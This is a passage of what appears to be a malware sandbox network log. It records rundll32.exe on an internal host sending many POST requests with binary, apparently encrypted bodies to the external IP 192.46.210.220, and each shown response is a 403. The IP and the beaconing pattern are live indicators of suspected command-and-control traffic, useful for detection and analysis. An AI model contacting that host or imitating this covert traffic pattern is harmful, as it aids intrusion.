                                                        Cache-Control: no-cache
2021-10-28 03:04:38 UTC  128                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:38 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
26          192.168.2.3  49861        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:40 UTC  128                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4814
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:41 UTC  133                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:41 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
27          192.168.2.3  49863        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:41 UTC  133                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4802
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:42 UTC  138                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:42 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
28          192.168.2.3  49870        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:44 UTC  138                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4814
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:44 UTC  143                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:44 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
29          192.168.2.3  49872        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:45 UTC  143                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4802
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:46 UTC  148                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:46 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
3           192.168.2.3  49756        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:03:53 UTC  14                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4802
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:03:53 UTC  19                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:03:53 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
30          192.168.2.3  49878        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:48 UTC  148                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4814
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:48 UTC  153                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:48 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.3 | 49880 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:49 UTC | 153 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:49 UTC | 153 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:04:49 UTC | 158 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:49 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.3 | 49886 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:51 UTC | 158 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:51 UTC | 158 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:04:52 UTC | 162 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:52 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.3 | 49888 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:53 UTC | 163 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:53 UTC | 163 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:04:54 UTC | 167 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.3 | 49894 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:57 UTC | 168 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:57 UTC | 168 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:04:58 UTC | 172 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:58 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.3 | 49896 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:58 UTC | 172 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:58 UTC | 173 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:04:59 UTC | 177 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.3 | 49902 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:01 UTC | 177 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:01 UTC | 178 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:05:02 UTC | 182 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.3 | 49904 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:02 UTC | 182 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:02 UTC | 182 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:05:03 UTC | 187 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:03 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.3 | 49912 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:05 UTC | 187 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:05 UTC | 187 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:05:05 UTC | 192 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.3 | 49917 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:06 UTC | 192 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:06 UTC | 192 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:05:06 UTC | 197 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:06 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49762 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:03:56 UTC | 19 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:03:56 UTC | 19 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:03:57 UTC | 29 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:03:57 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.3 | 49937 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:09 UTC | 197 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:09 UTC | 197 | OUT | Data Raw: (hex dump and ASCII rendering omitted)
2021-10-28 03:05:09 UTC | 202 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.3 | 49944 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:10 UTC | 202 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:10 UTC | 202 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:10 UTC | 207 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:10 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.3 | 49960 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:14 UTC | 207 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:14 UTC | 207 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:15 UTC | 212 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:15 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.3 | 49965 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:15 UTC | 212 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:15 UTC | 212 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:16 UTC | 217 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:16 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.3 | 49971 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:18 UTC | 217 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:18 UTC | 217 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:19 UTC | 222 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.3 | 49973 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:19 UTC | 222 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:19 UTC | 222 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:20 UTC | 227 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:19 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.3 | 49979 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:22 UTC | 227 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:22 UTC | 227 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:22 UTC | 232 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:22 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.3 | 49981 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:23 UTC | 232 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:23 UTC | 232 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:23 UTC | 237 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:23 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.3 | 49987 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:25 UTC | 237 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:25 UTC | 237 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:26 UTC | 242 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:26 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.3 | 49989 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:27 UTC | 242 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:27 UTC | 242 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:27 UTC | 246 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49764 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:03:57 UTC | 24 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:03:57 UTC | 24 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:03:57 UTC | 29 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:03:57 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 192.168.2.3 | 49995 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:05:29 UTC | 247 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:05:29 UTC | 247 | OUT | Data Raw: (binary POST body, hex dump not reproduced)
2021-10-28 03:05:30 UTC | 251 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:30 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 51
Source IP: 192.168.2.3
Source Port: 49997
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:31 UTC | kBytes transferred: 252 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:31 UTC | kBytes transferred: 252 | Direction: OUT
Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:31 UTC | kBytes transferred: 256 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:31 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 52
Source IP: 192.168.2.3
Source Port: 50003
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:34 UTC | kBytes transferred: 257 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:34 UTC | kBytes transferred: 257 | Direction: OUT
Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:35 UTC | kBytes transferred: 261 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 53
Source IP: 192.168.2.3
Source Port: 50005
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:35 UTC | kBytes transferred: 261 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:35 UTC | kBytes transferred: 262 | Direction: OUT
Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:36 UTC | kBytes transferred: 266 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:36 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 54
Source IP: 192.168.2.3
Source Port: 50011
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:38 UTC | kBytes transferred: 266 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:38 UTC | kBytes transferred: 266 | Direction: OUT
Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:39 UTC | kBytes transferred: 271 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:39 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 55
Source IP: 192.168.2.3
Source Port: 50013
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 03:05:39 UTC | kBytes transferred: 271 | Direction: OUT
Data:
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache

Timestamp: 2021-10-28 03:05:39 UTC | kBytes transferred: 271 | Direction: OUT
Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz

Timestamp: 2021-10-28 03:05:40 UTC | kBytes transferred: 276 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:05:40 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 56
Source IP: 192.168.2.3
Source Port: 50019
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

